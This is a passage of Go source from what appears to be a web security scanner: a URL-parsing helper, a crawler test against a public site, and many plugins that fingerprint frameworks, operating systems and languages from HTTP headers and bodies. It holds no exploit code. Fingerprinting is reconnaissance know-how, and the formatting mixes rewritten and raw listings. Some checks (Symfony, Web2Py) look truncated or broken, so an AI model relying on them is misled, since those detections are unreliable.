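	"net/url"
	"strings"
)

// UrlParse calls url.Parse and, if that fails, retries once with every "%" in
// the input replaced by "%25".
//
// On the retry path valid escapes are rewritten too ("%41" becomes "%2541"),
// so the returned URL is a double-encoded form of the input. Callers that use
// the result for scope or filter decisions should keep that in mind.
func UrlParse(sourceUrl string) (*url.URL, error) {
	parsed, err := url.Parse(sourceUrl)
	if err == nil {
		return parsed, nil
	}

	parsed, err = url.Parse(escapePercentSign(sourceUrl))
	if err != nil {
		return nil, errors.Wrap(err, "parse url error")
	}
	return parsed, nil
}

// escapePercentSign replaces every "%" in raw with "%25".
func escapePercentSign(raw string) string {
	return strings.ReplaceAll(raw, "%", "%25")
}

--------------------------------------------------------------------------------
/crawler/katana_test.go:
--------------------------------------------------------------------------------
package crawler

import (
	"github.com/projectdiscovery/katana/pkg/output"
	"github.com/yhy0/logging"
	"testing"
)

/**
  @author: yhy
  @since: 2023/1/31
  @desc: //TODO
**/

// TestKatana runs Katana against a fixed public URL and logs every request URL
// passed to the callback. It makes no assertions and needs network access to a
// third-party host, so it is not hermetic.
func TestKatana(t *testing.T) {
	logging.Logger = logging.New(false, "", "1", true)

	// Callback function to execute for result
	out := func(result output.Result) {
		// if ValidatePath(result.Request.URL) {
		// 	logging.Logger.Infoln(result.Request.URL)
		// }
		logging.Logger.Infoln(result.Request.URL)
	}

	Katana("https://www.baidu.com", true, true, out)
}

--------------------------------------------------------------------------------
/fingprints/fingprints_test.go:
--------------------------------------------------------------------------------
package fingprints

import (
	"fmt"
	regexp "github.com/wasilibs/go-re2"
	"testing"
)

/**
  @author: yhy
  @since: 2023/10/12
  @desc: TODO
**/

// TestFingprints runs every plugin in ProgramingPlugins against three sample
// headers and logs the names of those that match. It makes no assertions.
func TestFingprints(t *testing.T) {
	headers := map[string][]string{
		"Generator":    {"AsciiDoc 1.0.0;version:1.0.0"},
		"Set-Cookie":   {"JSESSIONID="},
		"X-Powered-By": {"PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1"},
	}
	for _, p := range ProgramingPlugins {
		if p.Fingerprint("", headers) {
			t.Log(p.Name())
		}
	}

	// The pattern needs a surrounding HTML tag, so the bare string below is not
	// expected to match.
	re := regexp.MustCompile(`<\w[^>]*(="/_jcr_content/)[^>]*>`)
	if re.FindStringIndex("_jcr_content") != nil {
		fmt.Println("-==")
	}
}

--------------------------------------------------------------------------------
/fingprints/framework/ApacheJackrabbit.go:
--------------------------------------------------------------------------------
package framework

import (
	regexp "github.com/wasilibs/go-re2"
)

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// apacheJackrabbitBodyRe matches an HTML tag that has an attribute value
// starting with "/_jcr_content/". It is compiled once at package scope instead
// of on every Fingerprint call.
var apacheJackrabbitBodyRe = regexp.MustCompile(`<\w[^>]*(="/_jcr_content/)[^>]*>`)

// ApacheJackrabbitPlugin fingerprints Apache Jackrabbit / Adobe CRX from the
// response body.
type ApacheJackrabbitPlugin struct{}

// Fingerprint reports whether body contains a tag matched by
// apacheJackrabbitBodyRe. headers is not used.
func (p ApacheJackrabbitPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return apacheJackrabbitBodyRe.FindStringIndex(body) != nil
}

// Name returns the display name of the detected technology.
func (p ApacheJackrabbitPlugin) Name() string {
	return "Apache Jackrabbit/Adobe CRX repository"
}

--------------------------------------------------------------------------------
/fingprints/framework/CakePHP.go:
--------------------------------------------------------------------------------
package framework

import (
	"strings"
)

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// CakePHPPlugin fingerprints CakePHP from the response headers.
type CakePHPPlugin struct{}

// Fingerprint reports whether the joined values of any header contain
// "CAKEPHP=". Every header is searched, not only Set-Cookie, and body is not
// used.
func (p CakePHPPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "CAKEPHP=") {
			return true
		}
	}

	return false
}

// Name returns the display name of the detected technology.
func (p CakePHPPlugin) Name() string {
	return "CakePHP - PHP Framework"
}

--------------------------------------------------------------------------------
/fingprints/framework/CherryPy.go:
--------------------------------------------------------------------------------
package framework

import "strings"

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// CherryPyPlugin fingerprints CherryPy from the response headers.
type CherryPyPlugin struct{}

// Fingerprint reports whether the joined values of any header contain
// "CherryPy". body is not used.
func (p CherryPyPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "CherryPy") {
			return true
		}
	}
	return false
}

// Name returns the display name of the detected technology.
func (p CherryPyPlugin) Name() string {
	return "CherryPy - Python Framework"
}

--------------------------------------------------------------------------------
/fingprints/framework/CodeIgniter.go:
--------------------------------------------------------------------------------
package framework

import "strings"

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// CodeIgniterPlugin fingerprints CodeIgniter from the response headers.
type CodeIgniterPlugin struct{}

// Fingerprint reports whether the joined values of any header contain
// "ci_session=". body is not used.
func (p CodeIgniterPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "ci_session=") {
			return true
		}
	}
	return false
}

// Name returns the display name of the detected technology.
func (p CodeIgniterPlugin) Name() string {
	return "CodeIgniter - PHP Framework"
}

--------------------------------------------------------------------------------
/fingprints/framework/Dancer.go:
--------------------------------------------------------------------------------
package framework

import "strings"

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// DancerPlugin fingerprints the Perl Dancer framework from the response
// headers.
type DancerPlugin struct{}

// Fingerprint reports whether the joined values of any header contain "Dancer"
// or "dancer.session=". body is not used.
func (p DancerPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		joined := strings.Join(values, "")
		switch {
		case strings.Contains(joined, "Dancer"),
			strings.Contains(joined, "dancer.session="):
			return true
		}
	}
	return false
}

// Name returns the display name of the detected technology.
func (p DancerPlugin) Name() string {
	return "Dancer - Perl Framework"
}

--------------------------------------------------------------------------------
/fingprints/framework/Django.go:
--------------------------------------------------------------------------------
package framework

import (
	"strings"
)

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// DjangoPlugin fingerprints Django from the response headers and body.
type DjangoPlugin struct{}

// Fingerprint reports whether the joined values of any header contain
// "wgiserver/", "python/" or "csrftoken=", or whether body contains
// "Welcome to Django".
//
// NOTE(review): the comparison is case-sensitive and the markers are
// lower-case; confirm that callers lower-case header values first, otherwise
// the first two markers will rarely match. "python/" is also not specific to
// Django, so a match on it alone is a weak signal.
func (p DjangoPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		joined := strings.Join(values, "")
		switch {
		case strings.Contains(joined, "wgiserver/"),
			strings.Contains(joined, "python/"),
			strings.Contains(joined, "csrftoken="):
			return true
		}
	}

	return strings.Contains(body, "Welcome to Django")
}

// Name returns the display name of the detected technology.
func (p DjangoPlugin) Name() string {
	return "Django - Python Framework"
}

--------------------------------------------------------------------------------
/fingprints/framework/Flask.go:
--------------------------------------------------------------------------------
package framework

import (
	"strings"
)

/**
  @author yhy
  @since 2023/10/13
  @desc //TODO
**/

// FlaskPlugin fingerprints Flask from the response headers.
type FlaskPlugin struct{}

// Fingerprint reports whether the joined values of any header contain "flask".
// body is not used.
func (p FlaskPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "flask") {
			return true
		}
	}

	return false
}

// Name returns the display name of the detected technology.
func (p FlaskPlugin) Name() string {
	return "Flask - Python Framework"
}

--------------------------------------------------------------------------------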
// File /fingprints/framework/FuelPHP.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// FuelPHPPlugin is the fingerprint plugin for the FuelPHP framework.
type FuelPHPPlugin struct{}

// Fingerprint reports a match when the body contains "Powered by FuelPHP" or
// when the values of any response header, joined without a separator,
// contain "fuelcid=". Both tests are plain substring matches, so a hit is a
// hint about the stack rather than proof.
func (p FuelPHPPlugin) Fingerprint(body string, headers map[string][]string) bool {
	if strings.Contains(body, "Powered by FuelPHP") {
		return true
	}
	for _, values := range headers {
		if joined := strings.Join(values, ""); strings.Contains(joined, "fuelcid=") {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p FuelPHPPlugin) Name() string {
	return "FuelPHP - PHP Framework"
}

// File /fingprints/framework/Grails.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// GrailsPlugin is the fingerprint plugin for the Grails framework.
type GrailsPlugin struct{}

// Fingerprint reports a match when an "X-Grails" or "X-Grails-Cached" header
// key is present (whatever its value), or when the joined values of any
// header contain "grails". The body is not inspected.
func (p GrailsPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, key := range [...]string{"X-Grails", "X-Grails-Cached"} {
		if _, present := headers[key]; present {
			return true
		}
	}
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "grails") {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p GrailsPlugin) Name() string {
	return "Grails - Java Framework"
}

// File /fingprints/framework/Karrigell.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// KarrigellPlugin is the fingerprint plugin for the Karrigell framework.
type KarrigellPlugin struct{}

// Fingerprint reports a match when the joined values of any header contain
// "karrigell". The body is not inspected.
func (p KarrigellPlugin) Fingerprint(body string, headers map[string][]string) bool {
	matched := false
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "karrigell") {
			matched = true
			break
		}
	}
	return matched
}

// Name returns the label reported for this fingerprint.
func (p KarrigellPlugin) Name() string {
	return "Karrigell - Python Framework"
}

// File /fingprints/framework/Laravel.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// LaravelPlugin is the fingerprint plugin for the Laravel framework.
type LaravelPlugin struct{}

// Fingerprint reports a match when the joined values of any header contain
// the "laravel_session=" cookie marker. The body is not inspected.
func (p LaravelPlugin) Fingerprint(body string, headers map[string][]string) bool {
	matched := false
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "laravel_session=") {
			matched = true
			break
		}
	}
	return matched
}

// Name returns the label reported for this fingerprint.
func (p LaravelPlugin) Name() string {
	return "Laravel - PHP Framework"
}

// File /fingprints/framework/Nette.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// NettePlugin is the fingerprint plugin for the Nette framework.
type NettePlugin struct{}

// Fingerprint reports a match when the joined values of any header contain
// "Nette" or the "nette-browser=" cookie marker. The body is not inspected.
func (p NettePlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		joined := strings.Join(values, "")
		switch {
		case strings.Contains(joined, "Nette"):
			return true
		case strings.Contains(joined, "nette-browser="):
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p NettePlugin) Name() string {
	return "Nette - PHP Framework"
}

// File /fingprints/framework/Phalcon.go:
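// Phalcon.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// PhalconPlugin is the fingerprint plugin for the Phalcon framework.
type PhalconPlugin struct{}

// Fingerprint reports a match when the values of any response header, joined
// without a separator, contain "phalcon". The listing also names the markers
// "phalcon-auth-" and "phalconphp.com"; both contain "phalcon", so the single
// test below accepts exactly the same inputs. The body is not inspected.
func (p PhalconPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "phalcon") {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p PhalconPlugin) Name() string {
	return "Phalcon - PHP Framework"
}

// File /fingprints/framework/Play.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// PlayPlugin is the fingerprint plugin for the Play framework.
type PlayPlugin struct{}

// Fingerprint reports a match when the joined values of any header contain
// "play! framework;". The body is not inspected.
func (p PlayPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), "play! framework;") {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p PlayPlugin) Name() string {
	return "Play - Java Framework"
}

// File /fingprints/framework/Seagull.go - package framework, imports
// regexp "github.com/wasilibs/go-re2" and "strings" (author yhy, since 2023/10/13).

// seagullSessIDRe matches the SGL_JS_SESSID JavaScript assignment. It is
// compiled once here instead of on every Fingerprint call.
var seagullSessIDRe = regexp.MustCompile(`var SGL_JS_SESSID[\s]*=`)

// SeagullPlugin is the fingerprint plugin for the Seagull PHP framework.
type SeagullPlugin struct{}

// Fingerprint reports a match when the body contains the banner
// "Powered by Seagull PHP Framework" or an SGL_JS_SESSID assignment.
// Headers are not inspected.
func (p SeagullPlugin) Fingerprint(body string, headers map[string][]string) bool {
	// NOTE(review): the listing starts with strings.Contains(body, ""). An
	// empty needle is contained in every string, so that test returned true
	// for every response and tagged every target as Seagull. It is left out
	// here. If the upstream file has a real marker in that position (it may
	// not have survived the rendering of this page), restore it instead.
	if strings.Contains(body, "Powered by Seagull PHP Framework") {
		return true
	}
	return seagullSessIDRe.FindStringIndex(body) != nil
}

// Name returns the label reported for this fingerprint.
func (p SeagullPlugin) Name() string {
	return "Seagull - PHP Framework"
}

// File /fingprints/framework/Spring.go - package framework, imports "strings" (author yhy, since 2023/10/13).

// SpringPlugin is the fingerprint plugin for the Spring framework.
type SpringPlugin struct{}

// Fingerprint reports a match when the joined values of any header contain
// the CookieLocaleResolver cookie name. The body is not inspected.
func (p SpringPlugin) Fingerprint(body string, headers map[string][]string) bool {
	const localeCookie = "org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE="
	for _, values := range headers {
		if strings.Contains(strings.Join(values, ""), localeCookie) {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p SpringPlugin) Name() string {
	return "Spring Framework - Java Platform"
}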
-------------------------------------------------------------------------------- /fingprints/framework/Symfony.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/10/13 8 | @desc //TODO 9 | **/ 10 | 11 | type SymfonyPlugin struct{} 12 | 13 | func (p SymfonyPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | if strings.Contains(body, "\"powered by symfony\"") { 15 | return true 16 | } 17 | 18 | if strings.Contains(body, "Powered by ") { 19 | return true 20 | } 21 | 22 | return false 23 | } 24 | 25 | func (p SymfonyPlugin) Name() string { 26 | return "Symfony - PHP Framework" 27 | } 28 | -------------------------------------------------------------------------------- /fingprints/framework/Web2Py.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type Web2PyPlugin struct{} 14 | 15 | func (p Web2PyPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | for _, v := range headers { 17 | value := strings.Join(v, "") 18 | if strings.Contains(value, "web2py") { 19 | return true 20 | } 21 | } 22 | 23 | if strings.Contains(body, "
") { 24 | return true 25 | } 26 | return false 27 | } 28 | 29 | func (p Web2PyPlugin) Name() string { 30 | return "Web2Py - Python Framework" 31 | } 32 | -------------------------------------------------------------------------------- /fingprints/framework/Yii.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type YiiPlugin struct{} 14 | 15 | func (p YiiPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if strings.Contains(body, "Yii Framework") { 17 | return true 18 | } 19 | 20 | if strings.Contains(body, ">Yii Framework") { 21 | return true 22 | } 23 | 24 | return false 25 | } 26 | 27 | func (p YiiPlugin) Name() string { 28 | return "Yii - PHP Framework" 29 | } 30 | -------------------------------------------------------------------------------- /fingprints/framework/beego.go: -------------------------------------------------------------------------------- 1 | package framework 2 | 3 | import "strings" 4 | 5 | /** 6 | @author yhy 7 | @since 2023/11/1 8 | @desc //TODO 9 | **/ 10 | 11 | type BeegoPlugin struct{} 12 | 13 | func (p BeegoPlugin) Fingerprint(body string, headers map[string][]string) bool { 14 | if strings.Contains(body, "Powered by beego") { 15 | return true 16 | } else { 17 | if v, ok := headers["Set-Cookie"]; ok { 18 | if strings.Contains(strings.Join(v, ""), "beegosessionID=") { 19 | return true 20 | } 21 | } 22 | } 23 | 24 | return false 25 | } 26 | 27 | func (p BeegoPlugin) Name() string { 28 | return "Beego Web Framework - Go" 29 | } 30 | -------------------------------------------------------------------------------- /fingprints/os/CentOS.go: -------------------------------------------------------------------------------- 1 | package os 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | 
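// /fingprints/os/CentOS.go, continued - package os, imports "strings".

// osHeaderContains reports whether the values stored under key, joined
// without a separator, contain marker. A missing key never matches.
// The lookup is an exact, case-sensitive map access.
// NOTE(review): presumably callers pass header names in canonical net/http
// form ("Server", "X-Powered-By") - confirm, otherwise a lower-case key is
// silently missed and the OS goes undetected.
func osHeaderContains(headers map[string][]string, key, marker string) bool {
	return strings.Contains(strings.Join(headers[key], ""), marker)
}

// CentOSPlugin is the fingerprint plugin for CentOS.
type CentOSPlugin struct{}

// Fingerprint reports a match when the "Server" or "X-Powered-By" header
// contains "CentOS". The body is not inspected.
func (p CentOSPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return osHeaderContains(headers, "Server", "CentOS") ||
		osHeaderContains(headers, "X-Powered-By", "CentOS")
}

// Name returns the label reported for this fingerprint.
func (p CentOSPlugin) Name() string {
	return "CentOS"
}

// File /fingprints/os/Darwin.go - package os, imports "strings" (author yhy, since 2023/10/13).

// DarwinPlugin is the fingerprint plugin for Darwin.
type DarwinPlugin struct{}

// Fingerprint reports a match when the "Server" or "X-Powered-By" header
// contains "Darwin". The body is not inspected.
func (p DarwinPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return osHeaderContains(headers, "Server", "Darwin") ||
		osHeaderContains(headers, "X-Powered-By", "Darwin")
}

// Name returns the label reported for this fingerprint.
func (p DarwinPlugin) Name() string {
	return "Darwin"
}

// File /fingprints/os/Debian.go - package os, imports
// regexp "github.com/wasilibs/go-re2" and "strings" (author yhy, since 2023/10/13).

// debianPoweredByRe matches "Debian", "dotdeb" or one of the release names
// listed in the pattern. It is compiled once instead of on every call.
var debianPoweredByRe = regexp.MustCompile(`(?:Debian|dotdeb|(sarge|etch|lenny|squeeze|wheezy|jessie))`)

// DebianPlugin is the fingerprint plugin for Debian.
type DebianPlugin struct{}

// Fingerprint reports a match when the "Server" header contains "Debian" or
// the "X-Powered-By" header matches debianPoweredByRe. The body is not
// inspected.
func (p DebianPlugin) Fingerprint(body string, headers map[string][]string) bool {
	if osHeaderContains(headers, "Server", "Debian") {
		return true
	}
	// An absent header joins to "", which the pattern cannot match.
	poweredBy := strings.Join(headers["X-Powered-By"], "")
	return debianPoweredByRe.FindStringIndex(poweredBy) != nil
}

// Name returns the label reported for this fingerprint.
func (p DebianPlugin) Name() string {
	return "Debian"
}

// File /fingprints/os/Fedora.go - package os, imports "strings" (author yhy, since 2023/10/13).

// FedoraPlugin is the fingerprint plugin for Fedora.
type FedoraPlugin struct{}

// Fingerprint reports a match when the "Server" header contains "Fedora".
// The body is not inspected.
func (p FedoraPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return osHeaderContains(headers, "Server", "Fedora")
}

// Name returns the label reported for this fingerprint.
func (p FedoraPlugin) Name() string {
	return "Fedora"
}

// File /fingprints/os/FreeBSD.go - package os, imports "strings" (author yhy, since 2023/10/13).

// FreeBSDPlugin is the fingerprint plugin for FreeBSD.
type FreeBSDPlugin struct{}

// Fingerprint reports a match when the "Server" header contains "FreeBSD".
// The body is not inspected.
func (p FreeBSDPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return osHeaderContains(headers, "Server", "FreeBSD")
}

// Name returns the label reported for this fingerprint.
func (p FreeBSDPlugin) Name() string {
	return "FreeBSD"
}

// File /fingprints/os/Gentoo.go - package os, imports "strings" (author yhy, since 2023/10/13).

// GentooPlugin is the fingerprint plugin for Gentoo.
type GentooPlugin struct{}

// Fingerprint reports a match when the "X-Powered-By" header contains the
// lower-case marker "gentoo". The body is not inspected.
func (p GentooPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return osHeaderContains(headers, "X-Powered-By", "gentoo")
}

// Name returns the label reported for this fingerprint.
func (p GentooPlugin) Name() string {
	return "Gentoo"
}

// File /fingprints/os/RedHat.go - package os, imports "strings" (author yhy, since 2023/10/13).

// RedHatPlugin is the fingerprint plugin for Red Hat.
type RedHatPlugin struct{}

// Fingerprint reports a match when the "Server" or "X-Powered-By" header
// contains "Red Hat". The body is not inspected.
func (p RedHatPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return osHeaderContains(headers, "Server", "Red Hat") ||
		osHeaderContains(headers, "X-Powered-By", "Red Hat")
}

// Name returns the label reported for this fingerprint.
func (p RedHatPlugin) Name() string {
	return "RedHat"
}

// File /fingprints/os/SUSE.go - package os, imports "strings" (author yhy, since 2023/10/13).

// SUSEPlugin is the fingerprint plugin for SUSE.
type SUSEPlugin struct{}

// Fingerprint reports a match when the "Server" or "X-Powered-By" header
// contains "SUSE". The body is not inspected.
func (p SUSEPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return osHeaderContains(headers, "Server", "SUSE") ||
		osHeaderContains(headers, "X-Powered-By", "SUSE")
}

// Name returns the label reported for this fingerprint. The listing returned
// "SunOS" here, the label of the SunOS plugin, so SUSE hosts were reported
// under the wrong operating system.
func (p SUSEPlugin) Name() string {
	return "SUSE"
}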
// File /fingprints/os/Scientific.go - package os, imports "strings" (author yhy, since 2023/10/13).

// ScientificPlugin is the fingerprint plugin for Scientific Linux.
type ScientificPlugin struct{}

// Fingerprint reports a match when the "Server" or "X-Powered-By" header,
// with its values joined without a separator, contains "Scientific Linux".
// The body is not inspected.
func (p ScientificPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, key := range [...]string{"Server", "X-Powered-By"} {
		// A missing key joins to "", which cannot contain the marker.
		if strings.Contains(strings.Join(headers[key], ""), "Scientific Linux") {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p ScientificPlugin) Name() string {
	return "Scientific"
}

// File /fingprints/os/SunOS.go - package os, imports "strings" (author yhy, since 2023/10/13).

// SunOSPlugin is the fingerprint plugin for SunOS.
type SunOSPlugin struct{}

// Fingerprint reports a match when the "Server" or "X-Powered-By" header
// contains "SunOS". The body is not inspected.
func (p SunOSPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, key := range [...]string{"Server", "X-Powered-By"} {
		if strings.Contains(strings.Join(headers[key], ""), "SunOS") {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p SunOSPlugin) Name() string {
	return "SunOS"
}

// File /fingprints/os/UNIX.go - package os, imports "strings" (author yhy, since 2023/10/13).

// UNIXPlugin is the fingerprint plugin for UNIX.
type UNIXPlugin struct{}

// Fingerprint reports a match when the "Server" header contains "UNIX".
// The body is not inspected.
func (p UNIXPlugin) Fingerprint(body string, headers map[string][]string) bool {
	server := strings.Join(headers["Server"], "")
	return strings.Contains(server, "UNIX")
}

// Name returns the label reported for this fingerprint.
func (p UNIXPlugin) Name() string {
	return "UNIX"
}

// File /fingprints/os/Ubuntu.go - package os, imports "strings" (author yhy, since 2023/10/13).

// UbuntuPlugin is the fingerprint plugin for Ubuntu.
type UbuntuPlugin struct{}

// Fingerprint reports a match when the "Server" or "X-Powered-By" header
// contains "Ubuntu". The body is not inspected.
func (p UbuntuPlugin) Fingerprint(body string, headers map[string][]string) bool {
	for _, key := range [...]string{"Server", "X-Powered-By"} {
		if strings.Contains(strings.Join(headers[key], ""), "Ubuntu") {
			return true
		}
	}
	return false
}

// Name returns the label reported for this fingerprint.
func (p UbuntuPlugin) Name() string {
	return "Ubuntu"
}

// File /fingprints/os/WindowsCE.go - package os, imports "strings" (author yhy, since 2023/10/13).

// WindowsCEPlugin is the fingerprint plugin for Windows CE.
type WindowsCEPlugin struct{}

// Fingerprint reports a match when the "Server" header contains "WinCE".
// The body is not inspected.
func (p WindowsCEPlugin) Fingerprint(body string, headers map[string][]string) bool {
	server := strings.Join(headers["Server"], "")
	return strings.Contains(server, "WinCE")
}

// Name returns the label reported for this fingerprint.
func (p WindowsCEPlugin) Name() string {
	return "Windows CE"
}

// File /fingprints/os/WindowsServer.go:
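// WindowsServer.go - package os, imports "strings" (author yhy, since 2023/10/13).

// WindowsServerPlugin is the fingerprint plugin for Windows Server.
type WindowsServerPlugin struct{}

// Fingerprint reports a match when the "Server" header, with its values
// joined without a separator, contains "Win32" or "Win64". The body is not
// inspected.
func (p WindowsServerPlugin) Fingerprint(body string, headers map[string][]string) bool {
	// Join once and test both markers; a missing key joins to "".
	server := strings.Join(headers["Server"], "")
	return strings.Contains(server, "Win32") || strings.Contains(server, "Win64")
}

// Name returns the label reported for this fingerprint.
func (p WindowsServerPlugin) Name() string {
	return "Windows Server"
}

// File /fingprints/programing/AsciiDoc.go - package programing, imports "strings" (author yhy, since 2023/10/13).

// AsciiDocPlugin is the fingerprint plugin for AsciiDoc.
type AsciiDocPlugin struct{}

// Fingerprint reports a match when the "Generator" header contains
// "AsciiDoc " (with the trailing space). The body is not inspected.
func (p AsciiDocPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return strings.Contains(strings.Join(headers["Generator"], ""), "AsciiDoc ")
}

// Name returns the label reported for this fingerprint.
func (p AsciiDocPlugin) Name() string {
	return "AsciiDoc"
}

// File /fingprints/programing/Asp.go - package programing, imports
// regexp "github.com/wasilibs/go-re2" (author yhy, since 2023/10/13).

// aspExtensionRe matches ".asp" optionally followed by "x". It is compiled
// once instead of on every Fingerprint call.
var aspExtensionRe = regexp.MustCompile(`\.asp(x)?`)

// AspPlugin is the fingerprint plugin for ASP.
type AspPlugin struct{}

// Fingerprint reports a match when the body contains ".asp" or ".aspx"
// anywhere. Headers are not inspected. The pattern is unanchored, so any
// occurrence in the page, including a link to another site, counts; treat a
// hit as a hint rather than proof.
func (p AspPlugin) Fingerprint(body string, headers map[string][]string) bool {
	return aspExtensionRe.FindStringIndex(body) != nil
}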
func (p AspPlugin) Name() string { 25 | return "ASP" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Erlang.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type ErlangPlugin struct{} 14 | 15 | func (p ErlangPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Erlang") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p ErlangPlugin) Name() string { 25 | return "Erlang" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Java.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type JavaPlugin struct{} 14 | 15 | func (p JavaPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Set-Cookie"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "JSESSIONID") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p JavaPlugin) Name() string { 25 | return "Java" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Lua.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type LuaPlugin struct{} 14 | 15 | func (p LuaPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["X-Powered-By"]; ok { 17 | if 
strings.Contains(strings.Join(v, ""), "Lua") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p LuaPlugin) Name() string { 25 | return "Lua" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Perl.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | regexp "github.com/wasilibs/go-re2" 5 | "strings" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2023/10/13 11 | @desc //TODO 12 | **/ 13 | 14 | type PerlPlugin struct{} 15 | 16 | func (p PerlPlugin) Fingerprint(body string, headers map[string][]string) bool { 17 | if v, ok := headers["Server"]; ok { 18 | if strings.Contains(strings.Join(v, ""), "Perl") { 19 | return true 20 | } 21 | } 22 | 23 | re := regexp.MustCompile(`\.pl(?:$|\?)`) 24 | if re.FindStringIndex(body) != nil { 25 | return true 26 | } 27 | 28 | return false 29 | } 30 | 31 | func (p PerlPlugin) Name() string { 32 | return "Perl" 33 | } 34 | -------------------------------------------------------------------------------- /fingprints/programing/Python.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | "strings" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/10/13 10 | @desc //TODO 11 | **/ 12 | 13 | type PythonPlugin struct{} 14 | 15 | func (p PythonPlugin) Fingerprint(body string, headers map[string][]string) bool { 16 | if v, ok := headers["Server"]; ok { 17 | if strings.Contains(strings.Join(v, ""), "Python") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | 24 | func (p PythonPlugin) Name() string { 25 | return "Python" 26 | } 27 | -------------------------------------------------------------------------------- /fingprints/programing/Ruby.go: -------------------------------------------------------------------------------- 1 | package programing 2 | 3 | import ( 4 | regexp 
